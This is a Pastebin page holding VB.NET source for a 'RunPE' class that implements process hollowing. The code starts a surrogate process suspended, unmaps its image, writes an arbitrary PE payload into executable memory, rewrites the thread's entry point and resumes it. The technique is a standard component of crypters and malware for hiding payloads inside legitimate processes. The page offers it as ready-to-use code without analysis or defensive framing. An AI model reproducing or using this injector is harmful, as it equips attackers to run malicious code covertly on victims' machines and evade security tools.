API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Sep 22nd, 2017
73
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.36 KB | None | 0 0
raw download clone embed print report
  1. Imports System.Runtime.InteropServices
  2. Imports System.Text
  3.  
  4. Public Class RunPE
  5. <DllImport("kernel32")> _
  6. Private Shared Function CreateProcess(ByVal appName As String, ByVal commandLine As StringBuilder, ByVal procAttr As IntPtr, ByVal thrAttr As IntPtr, <MarshalAs(UnmanagedType.Bool)> ByVal inherit As Boolean, ByVal creation As Integer, _
  7. ByVal env As IntPtr, ByVal curDir As String, ByVal sInfo As Byte(), ByVal pInfo As IntPtr()) As <MarshalAs(UnmanagedType.Bool)> Boolean
  8. End Function
  9. <DllImport("kernel32")> _
  10. Private Shared Function GetThreadContext(ByVal hThr As IntPtr, ByVal ctxt As UInteger()) As <MarshalAs(UnmanagedType.Bool)> Boolean
  11. End Function
  12. <DllImport("ntdll")> _
  13. Private Shared Function NtUnmapViewOfSection(ByVal hProc As IntPtr, ByVal baseAddr As IntPtr) As UInteger
  14. End Function
  15. <DllImport("kernel32")> _
  16. Private Shared Function ReadProcessMemory(ByVal hProc As IntPtr, ByVal baseAddr As IntPtr, ByRef bufr As IntPtr, ByVal bufrSize As Integer, ByRef numRead As IntPtr) As <MarshalAs(UnmanagedType.Bool)> Boolean
  17. End Function
  18. <DllImport("kernel32.dll")> _
  19. Private Shared Function ResumeThread(ByVal hThread As IntPtr) As UInteger
  20. End Function
  21. <DllImport("kernel32")> _
  22. Private Shared Function SetThreadContext(ByVal hThr As IntPtr, ByVal ctxt As UInteger()) As <MarshalAs(UnmanagedType.Bool)> Boolean
  23. End Function
  24. <DllImport("kernel32")> _
  25. Private Shared Function VirtualAllocEx(ByVal hProc As IntPtr, ByVal addr As IntPtr, ByVal size As IntPtr, ByVal allocType As Integer, ByVal prot As Integer) As IntPtr
  26. End Function
  27. <DllImport("kernel32", CharSet:=CharSet.Auto, SetLastError:=True)> _
  28. Private Shared Function VirtualProtectEx(ByVal hProcess As IntPtr, ByVal lpAddress As IntPtr, ByVal dwSize As IntPtr, ByVal flNewProtect As UInteger, ByRef lpflOldProtect As UInteger) As Boolean
  29. End Function
  30. <DllImport("kernel32.dll", SetLastError:=True)> _
  31. Private Shared Function WriteProcessMemory(ByVal hProcess As IntPtr, ByVal lpBaseAddress As IntPtr, ByVal lpBuffer As Byte(), ByVal nSize As UInteger, ByVal lpNumberOfBytesWritten As Integer) As Boolean
  32. End Function
  33.  
  34. Public Shared Function InjectPE(ByVal bytes As Byte(), ByVal surrogateProcess As String) As Boolean
  35. Try
  36. Dim procAttr As IntPtr = IntPtr.Zero
  37. Dim processInfo As IntPtr() = New IntPtr(3) {}
  38. Dim startupInfo As Byte() = New Byte(67) {}
  39.  
  40. Dim num2 As Integer = BitConverter.ToInt32(bytes, 60)
  41. Dim num As Integer = BitConverter.ToInt16(bytes, num2 + 6)
  42. Dim ptr4 As New IntPtr(BitConverter.ToInt32(bytes, num2 + &H54))
  43.  
  44. If CreateProcess(Nothing, New StringBuilder(surrogateProcess), procAttr, procAttr, False, 4, _
  45. procAttr, Nothing, startupInfo, processInfo) Then
  46. Dim ctxt As UInteger() = New UInteger(178) {}
  47. ctxt(0) = &H10002
  48. If GetThreadContext(processInfo(1), ctxt) Then
  49. Dim baseAddr As New IntPtr(ctxt(&H29) + 8L)
  50.  
  51. Dim buffer__1 As IntPtr = IntPtr.Zero
  52. Dim bufferSize As New IntPtr(4)
  53.  
  54. Dim numRead As IntPtr = IntPtr.Zero
  55.  
  56. If ReadProcessMemory(processInfo(0), baseAddr, buffer__1, CInt(bufferSize), numRead) AndAlso (NtUnmapViewOfSection(processInfo(0), buffer__1) = 0) Then
  57. Dim addr As New IntPtr(BitConverter.ToInt32(bytes, num2 + &H34))
  58. Dim size As New IntPtr(BitConverter.ToInt32(bytes, num2 + 80))
  59. Dim lpBaseAddress As IntPtr = VirtualAllocEx(processInfo(0), addr, size, &H3000, &H40)
  60.  
  61. Dim lpNumberOfBytesWritten As Integer
  62.  
  63. WriteProcessMemory(processInfo(0), lpBaseAddress, bytes, CUInt(CInt(ptr4)), lpNumberOfBytesWritten)
  64. Dim num5 As Integer = num - 1
  65. For i As Integer = 0 To num5
  66. Dim dst As Integer() = New Integer(9) {}
  67. Buffer.BlockCopy(bytes, (num2 + &HF8) + (i * 40), dst, 0, 40)
  68. Dim buffer2 As Byte() = New Byte((dst(4) - 1)) {}
  69. Buffer.BlockCopy(bytes, dst(5), buffer2, 0, buffer2.Length)
  70.  
  71. size = New IntPtr(lpBaseAddress.ToInt32() + dst(3))
  72. addr = New IntPtr(buffer2.Length)
  73.  
  74. WriteProcessMemory(processInfo(0), size, buffer2, CUInt(addr), lpNumberOfBytesWritten)
  75. Next
  76. size = New IntPtr(ctxt(&H29) + 8L)
  77. addr = New IntPtr(4)
  78.  
  79. WriteProcessMemory(processInfo(0), size, BitConverter.GetBytes(lpBaseAddress.ToInt32()), CUInt(addr), lpNumberOfBytesWritten)
  80. ctxt(&H2C) = CUInt(lpBaseAddress.ToInt32() + BitConverter.ToInt32(bytes, num2 + 40))
  81. SetThreadContext(processInfo(1), ctxt)
  82. End If
  83. End If
  84. ResumeThread(processInfo(1))
  85. End If
  86. Catch
  87. Return False
  88. End Try
  89. Return True
  90. End Function
  91.  
  92. Private Sub RunPE_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
  93.  
  94. End Sub
  95. End Class
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!